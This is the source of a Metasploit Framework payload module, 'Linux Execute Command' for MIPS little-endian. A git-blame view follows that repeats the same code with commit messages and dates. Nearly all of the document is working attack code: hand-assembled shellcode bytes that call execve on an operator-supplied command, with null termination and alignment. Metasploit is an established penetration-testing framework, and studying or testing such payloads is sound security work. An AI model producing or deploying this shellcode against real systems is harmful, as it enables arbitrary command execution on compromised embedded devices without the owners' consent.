modules/payloads/singles/linux/mipsle/exec.rb

# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 52

  include Msf::Payload::Single

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Execute Command',
        'Description' => %q{
          A very small shellcode for executing commands.
          This module is sometimes helpful for testing purposes as well as
          on targets with extremely limited buffer space.
        },
        'Author' => [
          'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload
          'entropy@phiral.net' # original payload
        ],
        'References' => [
          ['EDB', '17940']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSLE,
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
    register_options(
      [
        OptString.new('CMD', [ true, 'The command string to execute' ]),
      ]
    )
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    return datastore['CMD'] || ''
  end

  def generate(_opts = {})
    shellcode =
      "\x66\x06\x06\x24" + # li a2,1638
      "\xff\xff\xd0\x04" + # bltzal a2,4100b4
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
      "\x01\x10\xe4\x27" + # addiu a0,ra,4097
      "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065
      "\xe8\xff\xa4\xaf" + # sw a0,-24(sp)
      "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
      "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
      "\xab\x0f\x02\x24" + # li v0,4011
      "\x0c\x01\x01\x01"   # syscall 0x40404

    #
    # Constructs the payload
    #

    shellcode = shellcode + command_string + "\x00"

    # we need to align our shellcode to 4 bytes
    shellcode += "\x00" while shellcode.bytesize % 4 != 0

    return super + shellcode
  end
end
Fix crashing mipsle modules 2024-05-21 12:52:12 +01:00			`# -- coding: binary --`

change name and filename and file included 2014-03-25 09:13:04 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
Instantiate payload modules so parameter validation occurs 2015-08-13 11:10:50 -05:00			`CachedSize = 52`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
change name and filename and file included 2014-03-25 09:13:04 +01:00			`include Msf::Payload::Single`

			`def initialize(info = {})`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`super(`
			`merge_info(`
			`info,`
			`'Name' => 'Linux Execute Command',`
			`'Description' => %q{`
			`A very small shellcode for executing commands.`
			`This module is sometimes helpful for testing purposes as well as`
			`on targets with extremely limited buffer space.`
			`},`
			`'Author' => [`
			`'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload`
			`'entropy@phiral.net' # original payload`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`],`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`'References' => [`
Fix formatting of hash options. 2014-03-25 14:43:53 -05:00			`['EDB', '17940']`
			`],`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_MIPSLE,`
			`'Payload' => {`
			`'Offsets' => {},`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`'Payload' => ''`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`}`
			`)`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`)`
			`register_options(`
			`[`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`OptString.new('CMD', [ true, 'The command string to execute' ]),`
			`]`
			`)`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
			`return datastore['CMD'] \|\| ''`
			`end`

Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`shellcode =`
			`"\x66\x06\x06\x24" + # li a2,1638`
			`"\xff\xff\xd0\x04" + # bltzal a2,4100b4`
			`"\xff\xff\x06\x28" + # slti a2,zero,-1`
			`"\xe0\xff\xbd\x27" + # addiu sp,sp,-32`
			`"\x01\x10\xe4\x27" + # addiu a0,ra,4097`
			`"\x1f\xf0\x84\x24" + # addiu a0,a0,-4065`
			`"\xe8\xff\xa4\xaf" + # sw a0,-24(sp)`
			`"\xec\xff\xa0\xaf" + # sw zero,-20(sp)`
			`"\xe8\xff\xa5\x27" + # addiu a1,sp,-24`
			`"\xab\x0f\x02\x24" + # li v0,4011`
MIPS exec payload fixes for encoder 2014-04-30 20:37:54 +02:00			`"\x0c\x01\x01\x01" # syscall 0x40404`
change name and filename and file included 2014-03-25 09:13:04 +01:00
			`#`
			`# Constructs the payload`
			`#`
MIPS exec payload fixes for encoder 2014-04-30 20:37:54 +02:00
			`shellcode = shellcode + command_string + "\x00"`

			`# we need to align our shellcode to 4 bytes`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`shellcode += "\x00" while shellcode.bytesize % 4 != 0`
MIPS exec payload fixes for encoder 2014-04-30 20:37:54 +02:00
			`return super + shellcode`
change name and filename and file included 2014-03-25 09:13:04 +01:00			`end`
			`end`